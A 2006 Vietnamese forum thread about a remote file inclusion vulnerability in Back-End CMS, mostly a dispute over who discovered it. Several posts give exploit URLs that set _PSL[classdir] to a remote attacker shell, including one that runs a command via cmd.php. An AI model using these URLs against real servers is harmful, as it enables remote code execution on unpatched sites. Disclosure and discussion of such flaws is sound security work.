banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Back-End (BE_config.php) - Remote Include Files  XML
  [Announcement]   Back-End (BE_config.php) - Remote Include Files 28/06/2006 00:14:55 (+0700) | #1 | 1474
mrdung
Member

[Minus]    0    [Plus]
Joined: 20/03/2005 18:24:46
Messages: 12
Location: congdongtinhoc.com
Offline
[Profile] [PM]
Back-End (BE_config.php) - Remote Include Files

--------------------------------------------------------------------------------

Script:Back-End CMS <= 0.7.2.1
Found by : n2dung@gmail.com
Homepage: http://back-end.org
<?php
// $Id: BE_config.php,v 1.147 2005/06/22 20:40:33 mgifford Exp $
/**
* Back-End configuration file
*
* @package Back-End
* @version 0.7 $Id: BE_config.php,v 1.147 2005/06/22 20:40:33 mgifford Exp $
* @copyright Copyright (C) 2003 OpenConcept Consulting
*
* This file is part of Back-End.
*
* Back-End is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* Back-End is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with Back-End; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');  


http://www.example.com/BE_config.php?_PSL[classdir]=http://www.attachker/shell.php_? 
[Up] [Print Copy]
  [Question]   Re: Back-End (BE_config.php) - Remote Include Files 29/06/2006 00:06:36 (+0700) | #2 | 1779
[Avatar]
bebihochack
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 12:24:58
Messages: 6
Offline
[Profile] [PM] [Yahoo!]
Có địa chỉ cụ thể không?
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 29/06/2006 00:15:17 (+0700) | #3 | 1783
[Avatar]
H0angY3nXinhdep
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 12:58:49
Messages: 9
Offline
[Profile] [PM] [WWW] [Yahoo!]
Topic : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability

ExploitAlert Id : 633

Credit : Kacper

Date : 27.5.2006
Download


Exploit Code :

################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
# Back-End CMS - Remote File Include Vulnerabilities
# Find by Kacper (Rahim).
# Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
# Site of script: http://www.back-end.org
#
####################################################################
*/

BE_config.php Line 27-31:

Code:
...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...



/*

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]

#Elo smilie


ExploitAlert Id : 633

Credit : Kacper
http://securityreason.com/exploitalert/633
Date : 27.5.2006
Bạn Dũnglà chủ nhân hồi nào vậy?
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 29/06/2006 00:27:09 (+0700) | #4 | 1790
[Avatar]
H0angY3nXinhdep
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 12:58:49
Messages: 9
Offline
[Profile] [PM] [WWW] [Yahoo!]
Ngoài ra còn 1 lỗi nữa nè


# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end have a default path pre-set on jpcache.php,
# and cracker can execute a remote command.
#
# http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname



[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 29/06/2006 03:15:08 (+0700) | #5 | 1832
[Avatar]
phamquoc_truong
Elite Member

[Minus]    0    [Plus]
Joined: 04/04/2004 07:54:12
Messages: 79
Location: PeaceWorld
Offline
[Profile] [PM]
Thế cái này là do thành viên của HVA phát hiện ra à ???? smilie
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 29/06/2006 06:51:57 (+0700) | #6 | 1906
xemcongaitam
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 09:43:53
Messages: 1
Offline
[Profile] [PM]
thành viên hva hay là hacker ngoại ?
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 29/06/2006 07:33:32 (+0700) | #7 | 1921
mrdung
Member

[Minus]    0    [Plus]
Joined: 20/03/2005 18:24:46
Messages: 12
Location: congdongtinhoc.com
Offline
[Profile] [PM]

H0angY3nXinhdep wrote:
Topic : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability

ExploitAlert Id : 633

Credit : Kacper

Date : 27.5.2006
Download


Exploit Code :

################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
# Back-End CMS - Remote File Include Vulnerabilities
# Find by Kacper (Rahim).
# Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
# Site of script: http://www.back-end.org
#
####################################################################
*/

BE_config.php Line 27-31:

Code:
...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...



/*

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]

#Elo smilie


ExploitAlert Id : 633

Credit : Kacper
http://securityreason.com/exploitalert/633
Date : 27.5.2006
Bạn Dũnglà chủ nhân hồi nào vậy? 


Ôi sorry! Thực lòng bug này cũng do mình hunt thực và post tai đây:
http://forum.milw0rm.com/viewtopic.php?p=1531

Và củng public tại vniss.
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 29/06/2006 07:51:52 (+0700) | #8 | 1925
+Newbie+
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 01:24:42
Messages: 25
Location: Cần Thơ
Offline
[Profile] [PM]
smilie) kinh thât nhể .. Thế mà
Script:Back-End CMS <= 0.7.2.1
Found by : n2dung@gmail.com
Homepage: http://back-end.org

làm mình cứ ngở smilie
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 29/06/2006 08:50:00 (+0700) | #9 | 1945
hellier
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 21:01:53
Messages: 3
Offline
[Profile] [PM]
hix sao các bạn lại thía,việc 1 người Việt tìm dc bug đâu phải là chuyện động trời,đừng tự ti quá chứ
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 29/06/2006 13:39:08 (+0700) | #10 | 2024
[Avatar]
H0angY3nXinhdep
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 12:58:49
Messages: 9
Offline
[Profile] [PM] [WWW] [Yahoo!]
Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 29/06/2006 20:44:52 (+0700) | #11 | 2076
kilua_vniss
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 00:52:49
Messages: 16
Offline
[Profile] [PM]
bug nè thì có j` đâu mà ko phát hiện được cơ chứ nhỉ smilie ,kiddy như em ngồi 1 lúc view code còn phát hiện được mà , thật ra vn cũng có lắm người tìm ra bug lắm , but họ ko public thui mà smilie ,
[Up] [Print Copy]
  [Question]   Re: Back-End (BE_config.php) - Remote Include Files 29/06/2006 21:11:18 (+0700) | #12 | 2081
quanlytruong
Administrator

Joined: 01/01/2001 19:49:46
Messages: 204
Offline
[Profile] [PM]
Nếu bug không phải do chính thành viên HVA tìm ra mà post trong box này thì vi phạm 2 chuyện:

- post không đúng box
- không tôn trọng vấn đề bản quyền.

Nếu tái phạm, account sẽ bị vô hiệu hóa.
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 30/06/2006 01:55:23 (+0700) | #13 | 2184
Mr An Luong
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 11:55:16
Messages: 12
Location: TP HCM
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
nì, mấy bác đưa BUG ra luôn, chỉ cách khai thác luôn ... quá tuyệt !
Nhưng sao không có bác nào giải thích rõ hơn ý nghĩa của cái BUG nì hết vậy ....!????
[Up] [Print Copy]
  [Question]   Re: Back-End (BE_config.php) - Remote Include Files 30/06/2006 05:26:00 (+0700) | #14 | 2260
184
Member

[Minus]    0    [Plus]
Joined: 14/02/2004 04:27:34
Messages: 99
Location: Bộ Quốc Phòng
Offline
[Profile] [PM] [Email] [Yahoo!]
BUG này ác chiến thật smilie
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 30/06/2006 11:40:29 (+0700) | #15 | 2433
mrdung
Member

[Minus]    0    [Plus]
Joined: 20/03/2005 18:24:46
Messages: 12
Location: congdongtinhoc.com
Offline
[Profile] [PM]

H0angY3nXinhdep wrote:
Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng 


OK, nói chung dungit chỉ thường hay sinh hoạt tai http://milw0rm.com nên post tại đó, và bug thuộc dạng này thì qua đơn giản để hunt thôi, bên mục 'thảo luận bảo mật' mình củng post nguyên nhân rồi, vì nó là 1 trong những bug mình thấy thì mình post lên đây thôi, chứ có gì đâu. Chuyện trùng nhau thì tình cờ, sao các bạn lại trách mình ghê thế ?( Vã lại mình hoàn toàn hiểu nguên nhân gân ra bug thuộc dạng này và nguyên nhân xãy ra exploit thì có gì mà mình phải đi lấy của người khác chứ)...
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 02/07/2006 07:39:04 (+0700) | #16 | 3037
[Avatar]
dexxa
Member

[Minus]    0    [Plus]
Joined: 01/07/2006 20:35:01
Messages: 121
Offline
[Profile] [PM]
Bug tuyệt quá .. Thanks anh
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 27/09/2006 02:52:13 (+0700) | #17 | 26003
Nowhereman
Elite Member

[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]

Người tìm được Bug, hay là Bug đã được reported theo mình khi trình bày tác giả nên trình bày một cách rõ ràng mấy điểm chính sau :

1 - Lỗi bug, Versionx.x nếu có thể và TÁC GIẢ
2- Trạng thái bugs, Reported or not yet ? or what ?
3- Phân tích NGUYÊN Nhân bugs ( nếu có thể ) .
4- Đưa ra những ví dụ cụ thể nếu có .
5- Đưa ra những phương án giải quyết Vấn đề ( nếu có thể ) .

Chánh tình trạng copy and paste giải thích quá ngắn gọn làm mọi người không rõ vấn đề gây nên nhưng câu hỏi tiếp theo của các thành viên không mấy liên quan tới chủ đề tác giả muốn đưa ra .

Thân .




lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 27/09/2006 06:56:31 (+0700) | #18 | 26036
[Avatar]
havythoai
HVA Friend

Joined: 05/04/2004 22:59:39
Messages: 562
Offline
[Profile] [PM] [WWW]

mrdung wrote:

H0angY3nXinhdep wrote:
Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng 


OK, nói chung dungit chỉ thường hay sinh hoạt tai http://milw0rm.com nên post tại đó, và bug thuộc dạng này thì qua đơn giản để hunt thôi, bên mục 'thảo luận bảo mật' mình củng post nguyên nhân rồi, vì nó là 1 trong những bug mình thấy thì mình post lên đây thôi, chứ có gì đâu. Chuyện trùng nhau thì tình cờ, sao các bạn lại trách mình ghê thế ?( Vã lại mình hoàn toàn hiểu nguên nhân gân ra bug thuộc dạng này và nguyên nhân xãy ra exploit thì có gì mà mình phải đi lấy của người khác chứ)... 

Tôi nhận thấy chính dungit hunt được bug đó... trang http://milw0rm.com cũng đủ uy tín.

Về khả năng của dungit thì tôi thấy rất khá, qua những gì tôi thấy truớc đây
[Up] [Print Copy]
  [Question]   Back-End (BE_config.php) - Remote Include Files 05/12/2006 00:47:11 (+0700) | #19 | 27907
[Avatar]
MrSleep
HVA Friend

Joined: 21/09/2002 01:38:33
Messages: 47
Location: /home/bedroom
Offline
[Profile] [PM] [Yahoo!] [MSN] [ICQ]
Theo tôi thì cứ dựa trên ngày public lỗi trên hệ thống bugtraq mà công nhận ai phát hiện ra lỗi trước. Các bạn nên xây dựng với tinh thần góp ý và ít đả kích lại một chút thì cộng đồng sẽ phát triển tốt hơn.

Vài ý kiến.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|